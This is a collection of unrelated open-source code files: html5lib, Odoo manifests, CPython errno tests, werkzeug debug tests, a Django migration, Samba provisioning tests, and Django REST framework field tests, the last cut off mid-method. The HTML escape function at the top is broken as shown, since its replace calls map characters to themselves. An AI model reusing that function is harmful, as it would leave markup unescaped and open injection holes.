PendingDeprecationWarning, stacklevel=2)
s = s.replace("&", "&") # Must be done first!
s = s.replace("<", "<")
s = s.replace(">", ">")
if quote:
s = s.replace('"', """)
return s
def valid_boundary(s, _vb_pattern=None):
import re
if isinstance(s, bytes):
_vb_pattern = b"^[ -~]{0,200}[!-~]$"
else:
_vb_pattern = "^[ -~]{0,200}[!-~]$"
return re.match(_vb_pattern, s)
# Invoke mainline
# ===============
# Call test() when this file is run as a script (not imported as a module)
if __name__ == '__main__':
test()
| apache-2.0 |
clstl/servo | tests/wpt/css-tests/tools/html5lib/html5lib/treewalkers/__init__.py | 1229 | 2323 | """A collection of modules for iterating through different kinds of
tree, generating tokens identical to those produced by the tokenizer
module.
To create a tree walker for a new type of tree, you need to do
implement a tree walker object (called TreeWalker by convention) that
implements a 'serialize' method taking a tree as sole argument and
returning an iterator generating tokens.
"""
from __future__ import absolute_import, division, unicode_literals
import sys
from ..utils import default_etree
treeWalkerCache = {}
def getTreeWalker(treeType, implementation=None, **kwargs):
"""Get a TreeWalker class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - The xml.dom.minidom DOM implementation
"pulldom" - The xml.dom.pulldom event stream
"etree" - A generic walker for tree implementations exposing an
elementtree-like interface (known to work with
ElementTree, cElementTree and lxml.etree).
"lxml" - Optimized walker for lxml.etree
"genshi" - a Genshi stream
implementation - (Currently applies to the "etree" tree type only). A module
implementing the tree type e.g. xml.etree.ElementTree or
cElementTree."""
treeType = treeType.lower()
if treeType not in treeWalkerCache:
if treeType in ("dom", "pulldom"):
name = "%s.%s" % (__name__, treeType)
__import__(name)
mod = sys.modules[name]
treeWalkerCache[treeType] = mod.TreeWalker
elif treeType == "genshi":
from . import genshistream
treeWalkerCache[treeType] = genshistream.TreeWalker
elif treeType == "lxml":
from . import lxmletree
treeWalkerCache[treeType] = lxmletree.TreeWalker
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# XXX: NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeWalker
return treeWalkerCache.get(treeType)
| mpl-2.0 |
hurrinico/l10n-italy | l10n_it_ricevute_bancarie/__openerp__.py | 1 | 2257 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2012 Andrea Cometa.
# Email: [email protected]
# Web site: http://www.andreacometa.it
# Copyright (C) 2012 Agile Business Group sagl (<http://www.agilebg.com>)
# Copyright (C) 2012 Domsense srl (<http://www.domsense.com>)
# Copyright (C) 2012 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': "Ricevute Bancarie",
'version': "8.0.1.3.0",
'author': "Odoo Community Association (OCA)",
'category': "Accounting & Finance",
'website': "http://www.odoo-italia.org",
'license': "AGPL-3",
'depends': [
'account_voucher',
'l10n_it_fiscalcode',
'account_due_list',
'base_iban',
'l10n_it_abicab'],
'data': [
"views/partner_view.xml",
"views/configuration_view.xml",
"riba_sequence.xml",
"views/wizard_accreditation.xml",
"views/wizard_unsolved.xml",
"views/riba_view.xml",
"views/account_view.xml",
"views/wizard_riba_issue.xml",
"views/wizard_riba_file_export.xml",
"views/account_config_view.xml",
"riba_workflow.xml",
"security/ir.model.access.csv",
],
'images': [],
'demo': ["demo/riba_demo.xml"],
'test': [
'test/riba_invoice.yml',
'test/issue_riba.yml',
'test/unsolved_riba.yml',
],
'installable': True,
}
| agpl-3.0 |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.0/Lib/test/test_errno.py | 5 | 1160 | #! /usr/bin/env python
"""Test the errno module
Roger E. Masse
"""
import errno
from test import support
import unittest
std_c_errors = frozenset(['EDOM', 'ERANGE'])
class ErrnoAttributeTests(unittest.TestCase):
def test_for_improper_attributes(self):
# No unexpected attributes should be on the module.
for error_code in std_c_errors:
self.assert_(hasattr(errno, error_code),
"errno is missing %s" % error_code)
def test_using_errorcode(self):
# Every key value in errno.errorcode should be on the module.
for value in errno.errorcode.values():
self.assert_(hasattr(errno, value), 'no %s attr in errno' % value)
class ErrorcodeTests(unittest.TestCase):
def test_attributes_in_errorcode(self):
for attribute in errno.__dict__.keys():
if attribute.isupper():
self.assert_(getattr(errno, attribute) in errno.errorcode,
'no %s attr in errno.errorcode' % attribute)
def test_main():
support.run_unittest(ErrnoAttributeTests, ErrorcodeTests)
if __name__ == '__main__':
test_main()
| mit |
nbcesar/sabergrade | lib/python2.7/site-packages/werkzeug/testsuite/debug.py | 101 | 7859 | # -*- coding: utf-8 -*-
"""
werkzeug.testsuite.debug
~~~~~~~~~~~~~~~~~~~~~~~~
Tests some debug utilities.
:copyright: (c) 2013 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import unittest
import sys
import re
from werkzeug.testsuite import WerkzeugTestCase
from werkzeug.debug.repr import debug_repr, DebugReprGenerator, \
dump, helper
from werkzeug.debug.console import HTMLStringO
from werkzeug._compat import PY2
class DebugReprTestCase(WerkzeugTestCase):
def test_basic_repr(self):
self.assert_equal(debug_repr([]), u'[]')
self.assert_equal(debug_repr([1, 2]),
u'[<span class="number">1</span>, <span class="number">2</span>]')
self.assert_equal(debug_repr([1, 'test']),
u'[<span class="number">1</span>, <span class="string">\'test\'</span>]')
self.assert_equal(debug_repr([None]),
u'[<span class="object">None</span>]')
def test_sequence_repr(self):
self.assert_equal(debug_repr(list(range(20))), (
u'[<span class="number">0</span>, <span class="number">1</span>, '
u'<span class="number">2</span>, <span class="number">3</span>, '
u'<span class="number">4</span>, <span class="number">5</span>, '
u'<span class="number">6</span>, <span class="number">7</span>, '
u'<span class="extended"><span class="number">8</span>, '
u'<span class="number">9</span>, <span class="number">10</span>, '
u'<span class="number">11</span>, <span class="number">12</span>, '
u'<span class="number">13</span>, <span class="number">14</span>, '
u'<span class="number">15</span>, <span class="number">16</span>, '
u'<span class="number">17</span>, <span class="number">18</span>, '
u'<span class="number">19</span></span>]'
))
def test_mapping_repr(self):
self.assert_equal(debug_repr({}), u'{}')
self.assert_equal(debug_repr({'foo': 42}),
u'{<span class="pair"><span class="key"><span class="string">\'foo\''
u'</span></span>: <span class="value"><span class="number">42'
u'</span></span></span>}')
self.assert_equal(debug_repr(dict(zip(range(10), [None] * 10))),
u'{<span class="pair"><span class="key"><span class="number">0</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">1</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">2</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">3</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="extended"><span class="pair"><span class="key"><span class="number">4</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">5</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">6</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">7</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">8</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">9</span></span>: <span class="value"><span class="object">None</span></span></span></span>}')
self.assert_equal(
debug_repr((1, 'zwei', u'drei')),
u'(<span class="number">1</span>, <span class="string">\''
u'zwei\'</span>, <span class="string">%s\'drei\'</span>)' % ('u' if PY2 else ''))
def test_custom_repr(self):
class Foo(object):
def __repr__(self):
return '<Foo 42>'
self.assert_equal(debug_repr(Foo()),
'<span class="object"><Foo 42></span>')
def test_list_subclass_repr(self):
class MyList(list):
pass
self.assert_equal(
debug_repr(MyList([1, 2])),
u'<span class="module">werkzeug.testsuite.debug.</span>MyList(['
u'<span class="number">1</span>, <span class="number">2</span>])')
def test_regex_repr(self):
self.assert_equal(debug_repr(re.compile(r'foo\d')),
u're.compile(<span class="string regex">r\'foo\\d\'</span>)')
#XXX: no raw string here cause of a syntax bug in py3.3
self.assert_equal(debug_repr(re.compile(u'foo\\d')),
u're.compile(<span class="string regex">%sr\'foo\\d\'</span>)' %
('u' if PY2 else ''))
def test_set_repr(self):
self.assert_equal(debug_repr(frozenset('x')),
u'frozenset([<span class="string">\'x\'</span>])')
self.assert_equal(debug_repr(set('x')),
u'set([<span class="string">\'x\'</span>])')
def test_recursive_repr(self):
a = [1]
a.append(a)
self.assert_equal(debug_repr(a),
u'[<span class="number">1</span>, [...]]')
def test_broken_repr(self):
class Foo(object):
def __repr__(self):
raise Exception('broken!')
self.assert_equal(
debug_repr(Foo()),
u'<span class="brokenrepr"><broken repr (Exception: '
u'broken!)></span>')
class Foo(object):
x = 42
y = 23
def __init__(self):
self.z = 15
class DebugHelpersTestCase(WerkzeugTestCase):
def test_object_dumping(self):
drg = DebugReprGenerator()
out = drg.dump_object(Foo())
assert re.search('Details for werkzeug.testsuite.debug.Foo object at', out)
assert re.search('<th>x.*<span class="number">42</span>(?s)', out)
assert re.search('<th>y.*<span class="number">23</span>(?s)', out)
assert re.search('<th>z.*<span class="number">15</span>(?s)', out)
out = drg.dump_object({'x': 42, 'y': 23})
assert re.search('Contents of', out)
assert re.search('<th>x.*<span class="number">42</span>(?s)', out)
assert re.search('<th>y.*<span class="number">23</span>(?s)', out)
out = drg.dump_object({'x': 42, 'y': 23, 23: 11})
assert not re.search('Contents of', out)
out = drg.dump_locals({'x': 42, 'y': 23})
assert re.search('Local variables in frame', out)
assert re.search('<th>x.*<span class="number">42</span>(?s)', out)
assert re.search('<th>y.*<span class="number">23</span>(?s)', out)
def test_debug_dump(self):
old = sys.stdout
sys.stdout = HTMLStringO()
try:
dump([1, 2, 3])
x = sys.stdout.reset()
dump()
y = sys.stdout.reset()
finally:
sys.stdout = old
self.assert_in('Details for list object at', x)
self.assert_in('<span class="number">1</span>', x)
self.assert_in('Local variables in frame', y)
self.assert_in('<th>x', y)
self.assert_in('<th>old', y)
def test_debug_help(self):
old = sys.stdout
sys.stdout = HTMLStringO()
try:
helper([1, 2, 3])
x = sys.stdout.reset()
finally:
sys.stdout = old
self.assert_in('Help on list object', x)
self.assert_in('__delitem__', x)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(DebugReprTestCase))
suite.addTest(unittest.makeSuite(DebugHelpersTestCase))
return suite
| apache-2.0 |
DarkArtek/FFXIVITAFC | news2/migrations/0001_initial.py | 1 | 1204 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-07-28 08:26
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='PostNews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='Titolo Articolo')),
('text', models.TextField(verbose_name='Contenuto')),
('created_date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Data di Creazione')),
('published_date', models.DateTimeField(blank=True, null=True, verbose_name='Data di Pubblicazione')),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Autore')),
],
),
]
| unlicense |
shingonoide/odoo | addons/hr_contract/__openerp__.py | 260 | 1834 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Employee Contracts',
'version': '1.0',
'category': 'Human Resources',
'description': """
Add all information on the employee form to manage contracts.
=============================================================
* Contract
* Place of Birth,
* Medical Examination Date
* Company Vehicle
You can assign several contracts per employee.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/employees',
'depends': ['base_action_rule', 'hr'],
'data': [
'security/ir.model.access.csv',
'hr_contract_view.xml',
'hr_contract_data.xml',
'base_action_rule_view.xml',
],
'demo': [],
'test': ['test/test_hr_contract.yml'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
sYnfo/samba-1 | python/samba/tests/upgradeprovisionneeddc.py | 32 | 7461 | # Unix SMB/CIFS implementation.
# Copyright (C) Jelmer Vernooij <[email protected]> 2007-2008
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Tests for samba.upgradeprovision that need a DC."""
import os
import re
import shutil
from samba import param
from samba.credentials import Credentials
from samba.auth import system_session
from samba.provision import getpolicypath,find_provision_key_parameters
from samba.upgradehelpers import (get_paths, get_ldbs,
identic_rename,
updateOEMInfo, getOEMInfo, update_gpo,
delta_update_basesamdb,
update_dns_account_password,
search_constructed_attrs_stored,
increment_calculated_keyversion_number)
from samba.tests import env_loadparm, TestCaseInTempDir
from samba.tests.provision import create_dummy_secretsdb
import ldb
def dummymessage(a=None, b=None):
pass
smb_conf_path = "%s/%s/%s" % (os.environ["SELFTEST_PREFIX"], "ad_dc_ntvfs", "etc/smb.conf")
class UpgradeProvisionBasicLdbHelpersTestCase(TestCaseInTempDir):
"""Some simple tests for individual functions in the provisioning code.
"""
def test_get_ldbs(self):
paths = get_paths(param, None, smb_conf_path)
creds = Credentials()
lp = env_loadparm()
creds.guess(lp)
get_ldbs(paths, creds, system_session(), lp)
def test_find_key_param(self):
paths = get_paths(param, None, smb_conf_path)
creds = Credentials()
lp = env_loadparm()
creds.guess(lp)
rootdn = "dc=samba,dc=example,dc=com"
ldbs = get_ldbs(paths, creds, system_session(), lp)
names = find_provision_key_parameters(ldbs.sam, ldbs.secrets, ldbs.idmap,
paths, smb_conf_path, lp)
self.assertEquals(names.realm, "SAMBA.EXAMPLE.COM")
self.assertEquals(str(names.rootdn).lower(), rootdn.lower())
self.assertNotEquals(names.policyid_dc, None)
self.assertNotEquals(names.ntdsguid, "")
class UpgradeProvisionWithLdbTestCase(TestCaseInTempDir):
def _getEmptyDbName(self):
return os.path.join(self.tempdir, "sam.ldb")
def setUp(self):
super(UpgradeProvisionWithLdbTestCase, self).setUp()
paths = get_paths(param, None, smb_conf_path)
self.creds = Credentials()
self.lp = env_loadparm()
self.creds.guess(self.lp)
self.paths = paths
self.ldbs = get_ldbs(paths, self.creds, system_session(), self.lp)
self.names = find_provision_key_parameters(self.ldbs.sam,
self.ldbs.secrets, self.ldbs.idmap, paths, smb_conf_path,
self.lp)
self.referencedb = create_dummy_secretsdb(
os.path.join(self.tempdir, "ref.ldb"))
def test_search_constructed_attrs_stored(self):
hashAtt = search_constructed_attrs_stored(self.ldbs.sam,
self.names.rootdn,
["msds-KeyVersionNumber"])
self.assertFalse(hashAtt.has_key("msds-KeyVersionNumber"))
def test_increment_calculated_keyversion_number(self):
dn = "CN=Administrator,CN=Users,%s" % self.names.rootdn
# We conctruct a simple hash for the user administrator
hash = {}
# And we want the version to be 140
hash[dn.lower()] = 140
increment_calculated_keyversion_number(self.ldbs.sam,
self.names.rootdn,
hash)
self.assertEqual(self.ldbs.sam.get_attribute_replmetadata_version(dn,
"unicodePwd"),
140)
# This function should not decrement the version
hash[dn.lower()] = 130
increment_calculated_keyversion_number(self.ldbs.sam,
self.names.rootdn,
hash)
self.assertEqual(self.ldbs.sam.get_attribute_replmetadata_version(dn,
"unicodePwd"),
140)
def test_identic_rename(self):
rootdn = "DC=samba,DC=example,DC=com"
guestDN = ldb.Dn(self.ldbs.sam, "CN=Guest,CN=Users,%s" % rootdn)
identic_rename(self.ldbs.sam, guestDN)
res = self.ldbs.sam.search(expression="(name=Guest)", base=rootdn,
scope=ldb.SCOPE_SUBTREE, attrs=["dn"])
self.assertEquals(len(res), 1)
self.assertEquals(str(res[0]["dn"]), "CN=Guest,CN=Users,%s" % rootdn)
def test_delta_update_basesamdb(self):
dummysampath = self._getEmptyDbName()
delta_update_basesamdb(self.paths.samdb, dummysampath,
self.creds, system_session(), self.lp,
dummymessage)
def test_update_gpo_simple(self):
dir = getpolicypath(self.paths.sysvol, self.names.dnsdomain,
self.names.policyid)
shutil.rmtree(dir)
self.assertFalse(os.path.isdir(dir))
update_gpo(self.paths, self.ldbs.sam, self.names, self.lp, dummymessage)
self.assertTrue(os.path.isdir(dir))
def test_update_gpo_acl(self):
path = os.path.join(self.tempdir, "testupdategpo")
save = self.paths.sysvol
self.paths.sysvol = path
os.mkdir(path)
os.mkdir(os.path.join(path, self.names.dnsdomain))
os.mkdir(os.path.join(os.path.join(path, self.names.dnsdomain),
"Policies"))
update_gpo(self.paths, self.ldbs.sam, self.names, self.lp, dummymessage)
shutil.rmtree(path)
self.paths.sysvol = save
def test_getOEMInfo(self):
realm = self.lp.get("realm")
basedn = "DC=%s" % realm.replace(".", ", DC=")
oem = getOEMInfo(self.ldbs.sam, basedn)
self.assertNotEquals(oem, "")
def test_update_dns_account(self):
update_dns_account_password(self.ldbs.sam, self.ldbs.secrets,
self.names)
def test_updateOEMInfo(self):
realm = self.lp.get("realm")
basedn = "DC=%s" % realm.replace(".", ", DC=")
oem = getOEMInfo(self.ldbs.sam, basedn)
updateOEMInfo(self.ldbs.sam, basedn)
oem2 = getOEMInfo(self.ldbs.sam, basedn)
self.assertNotEquals(str(oem), str(oem2))
self.assertTrue(re.match(".*upgrade to.*", str(oem2)))
def tearDown(self):
for name in ["ref.ldb", "secrets.ldb", "secrets.tdb", "secrets.tdb.bak", "secrets.ntdb", "sam.ldb"]:
path = os.path.join(self.tempdir, name)
if os.path.exists(path):
os.unlink(path)
super(UpgradeProvisionWithLdbTestCase, self).tearDown()
| gpl-3.0 |
johnraz/django-rest-framework | tests/test_fields.py | 1 | 54851 | import datetime
import os
import uuid
from decimal import Decimal
import pytest
from django.http import QueryDict
from django.test import TestCase, override_settings
from django.utils import six, timezone
import rest_framework
from rest_framework import serializers
# Tests for field keyword arguments and core functionality.
# ---------------------------------------------------------
class TestEmpty:
"""
Tests for `required`, `allow_null`, `allow_blank`, `default`.
"""
def test_required(self):
"""
By default a field must be included in the input.
"""
field = serializers.IntegerField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation()
assert exc_info.value.detail == ['This field is required.']
def test_not_required(self):
"""
If `required=False` then a field may be omitted from the input.
"""
field = serializers.IntegerField(required=False)
with pytest.raises(serializers.SkipField):
field.run_validation()
def test_disallow_null(self):
"""
By default `None` is not a valid input.
"""
field = serializers.IntegerField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(None)
assert exc_info.value.detail == ['This field may not be null.']
def test_allow_null(self):
"""
If `allow_null=True` then `None` is a valid input.
"""
field = serializers.IntegerField(allow_null=True)
output = field.run_validation(None)
assert output is None
def test_disallow_blank(self):
"""
By default '' is not a valid input.
"""
field = serializers.CharField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation('')
assert exc_info.value.detail == ['This field may not be blank.']
def test_allow_blank(self):
"""
If `allow_blank=True` then '' is a valid input.
"""
field = serializers.CharField(allow_blank=True)
output = field.run_validation('')
assert output == ''
def test_default(self):
"""
If `default` is set, then omitted values get the default input.
"""
field = serializers.IntegerField(default=123)
output = field.run_validation()
assert output is 123
class TestSource:
def test_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='other')
serializer = ExampleSerializer(data={'example_field': 'abc'})
assert serializer.is_valid()
assert serializer.validated_data == {'other': 'abc'}
def test_redundant_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_field')
with pytest.raises(AssertionError) as exc_info:
ExampleSerializer().fields
assert str(exc_info.value) == (
"It is redundant to specify `source='example_field'` on field "
"'CharField' in serializer 'ExampleSerializer', because it is the "
"same as the field name. Remove the `source` keyword argument."
)
def test_callable_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_callable')
class ExampleInstance(object):
def example_callable(self):
return 'example callable value'
serializer = ExampleSerializer(ExampleInstance())
assert serializer.data['example_field'] == 'example callable value'
def test_callable_source_raises(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_callable', read_only=True)
class ExampleInstance(object):
def example_callable(self):
raise AttributeError('method call failed')
with pytest.raises(ValueError) as exc_info:
serializer = ExampleSerializer(ExampleInstance())
serializer.data.items()
assert 'method call failed' in str(exc_info.value)
class TestReadOnly:
def setup(self):
class TestSerializer(serializers.Serializer):
read_only = serializers.ReadOnlyField()
writable = serializers.IntegerField()
self.Serializer = TestSerializer
def test_validate_read_only(self):
"""
Read-only serializers.should not be included in validation.
"""
data = {'read_only': 123, 'writable': 456}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {'writable': 456}
def test_serialize_read_only(self):
"""
Read-only serializers.should be serialized.
"""
instance = {'read_only': 123, 'writable': 456}
serializer = self.Serializer(instance)
assert serializer.data == {'read_only': 123, 'writable': 456}
class TestWriteOnly:
def setup(self):
class TestSerializer(serializers.Serializer):
write_only = serializers.IntegerField(write_only=True)
readable = serializers.IntegerField()
self.Serializer = TestSerializer
def test_validate_write_only(self):
"""
Write-only serializers.should be included in validation.
"""
data = {'write_only': 123, 'readable': 456}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {'write_only': 123, 'readable': 456}
def test_serialize_write_only(self):
"""
Write-only serializers.should not be serialized.
"""
instance = {'write_only': 123, 'readable': 456}
serializer = self.Serializer(instance)
assert serializer.data == {'readable': 456}
class TestInitial:
def setup(self):
class TestSerializer(serializers.Serializer):
initial_field = serializers.IntegerField(initial=123)
blank_field = serializers.IntegerField()
self.serializer = TestSerializer()
def test_initial(self):
"""
Initial values should be included when serializing a new representation.
"""
assert self.serializer.data == {
'initial_field': 123,
'blank_field': None
}
class TestInitialWithCallable:
def setup(self):
def initial_value():
return 123
class TestSerializer(serializers.Serializer):
initial_field = serializers.IntegerField(initial=initial_value)
self.serializer = TestSerializer()
def test_initial_should_accept_callable(self):
"""
Follows the default ``Field.initial`` behaviour where they accept a
callable to produce the initial value"""
assert self.serializer.data == {
'initial_field': 123,
}
class TestLabel:
def setup(self):
class TestSerializer(serializers.Serializer):
labeled = serializers.IntegerField(label='My label')
self.serializer = TestSerializer()
def test_label(self):
"""
A field's label may be set with the `label` argument.
"""
fields = self.serializer.fields
assert fields['labeled'].label == 'My label'
class TestInvalidErrorKey:
def setup(self):
class ExampleField(serializers.Field):
def to_native(self, data):
self.fail('incorrect')
self.field = ExampleField()
def test_invalid_error_key(self):
"""
If a field raises a validation error, but does not have a corresponding
error message, then raise an appropriate assertion error.
"""
with pytest.raises(AssertionError) as exc_info:
self.field.to_native(123)
expected = (
'ValidationError raised by `ExampleField`, but error key '
'`incorrect` does not exist in the `error_messages` dictionary.'
)
assert str(exc_info.value) == expected
class TestBooleanHTMLInput:
def test_empty_html_checkbox(self):
"""
HTML checkboxes do not send any value, but should be treated
as `False` by BooleanField.
"""
class TestSerializer(serializers.Serializer):
archived = serializers.BooleanField()
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'archived': False}
def test_empty_html_checkbox_not_required(self):
"""
HTML checkboxes do not send any value, but should be treated
as `False` by BooleanField, even if the field is required=False.
"""
class TestSerializer(serializers.Serializer):
archived = serializers.BooleanField(required=False)
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'archived': False}
class TestHTMLInput:
def test_empty_html_charfield_with_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(default='happy')
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'message': 'happy'}
def test_empty_html_charfield_without_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_blank=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_charfield_without_default_not_required(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_blank=True, required=False)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_integerfield(self):
class TestSerializer(serializers.Serializer):
message = serializers.IntegerField(default=123)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': 123}
def test_empty_html_uuidfield_with_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.UUIDField(default=uuid.uuid4)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert list(serializer.validated_data.keys()) == ['message']
def test_empty_html_uuidfield_with_optional(self):
class TestSerializer(serializers.Serializer):
message = serializers.UUIDField(required=False)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert list(serializer.validated_data.keys()) == []
def test_empty_html_charfield_allow_null(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_null=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': None}
def test_empty_html_datefield_allow_null(self):
class TestSerializer(serializers.Serializer):
expiry = serializers.DateField(allow_null=True)
serializer = TestSerializer(data=QueryDict('expiry='))
assert serializer.is_valid()
assert serializer.validated_data == {'expiry': None}
def test_empty_html_charfield_allow_null_allow_blank(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_null=True, allow_blank=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_charfield_required_false(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(required=False)
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {}
def test_querydict_list_input(self):
class TestSerializer(serializers.Serializer):
scores = serializers.ListField(child=serializers.IntegerField())
serializer = TestSerializer(data=QueryDict('scores=1&scores=3'))
assert serializer.is_valid()
assert serializer.validated_data == {'scores': [1, 3]}
def test_querydict_list_input_only_one_input(self):
class TestSerializer(serializers.Serializer):
scores = serializers.ListField(child=serializers.IntegerField())
serializer = TestSerializer(data=QueryDict('scores=1&'))
assert serializer.is_valid()
assert serializer.validated_data == {'scores': [1]}
class TestCreateOnlyDefault:
def setup(self):
default = serializers.CreateOnlyDefault('2001-01-01')
class TestSerializer(serializers.Serializer):
published = serializers.HiddenField(default=default)
text = serializers.CharField()
self.Serializer = TestSerializer
def test_create_only_default_is_provided(self):
serializer = self.Serializer(data={'text': 'example'})
assert serializer.is_valid()
assert serializer.validated_data == {
'text': 'example', 'published': '2001-01-01'
}
def test_create_only_default_is_not_provided_on_update(self):
instance = {
'text': 'example', 'published': '2001-01-01'
}
serializer = self.Serializer(instance, data={'text': 'example'})
assert serializer.is_valid()
assert serializer.validated_data == {
'text': 'example',
}
def test_create_only_default_callable_sets_context(self):
"""
CreateOnlyDefault instances with a callable default should set_context
on the callable if possible
"""
class TestCallableDefault:
def set_context(self, serializer_field):
self.field = serializer_field
def __call__(self):
return "success" if hasattr(self, 'field') else "failure"
class TestSerializer(serializers.Serializer):
context_set = serializers.CharField(default=serializers.CreateOnlyDefault(TestCallableDefault()))
serializer = TestSerializer(data={})
assert serializer.is_valid()
assert serializer.validated_data['context_set'] == 'success'
# Tests for field input and output values.
# ----------------------------------------
def get_items(mapping_or_list_of_two_tuples):
# Tests accept either lists of two tuples, or dictionaries.
if isinstance(mapping_or_list_of_two_tuples, dict):
# {value: expected}
return mapping_or_list_of_two_tuples.items()
# [(value, expected), ...]
return mapping_or_list_of_two_tuples
class FieldValues:
"""
Base class for testing valid and invalid input values.
"""
def test_valid_inputs(self):
"""
Ensure that valid values return the expected validated data.
"""
for input_value, expected_output in get_items(self.valid_inputs):
assert self.field.run_validation(input_value) == expected_output
def test_invalid_inputs(self):
"""
Ensure that invalid values raise the expected validation error.
"""
for input_value, expected_failure in get_items(self.invalid_inputs):
with pytest.raises(serializers.ValidationError) as exc_info:
self.field.run_validation(input_value)
assert exc_info.value.detail == expected_failure
def test_outputs(self):
for output_value, expected_output in get_items(self.outputs):
assert self.field.to_representation(output_value) == expected_output
# Boolean types...
class TestBooleanField(FieldValues):
"""
Valid and invalid values for `BooleanField`.
"""
valid_inputs = {
'true': True,
'false': False,
'1': True,
'0': False,
1: True,
0: False,
True: True,
False: False,
}
invalid_inputs = {
'foo': ['"foo" is not a valid boolean.'],
None: ['This field may not be null.']
}
outputs = {
'true': True,
'false': False,
'1': True,
'0': False,
1: True,
0: False,
True: True,
False: False,
'other': True
}
field = serializers.BooleanField()
def test_disallow_unhashable_collection_types(self):
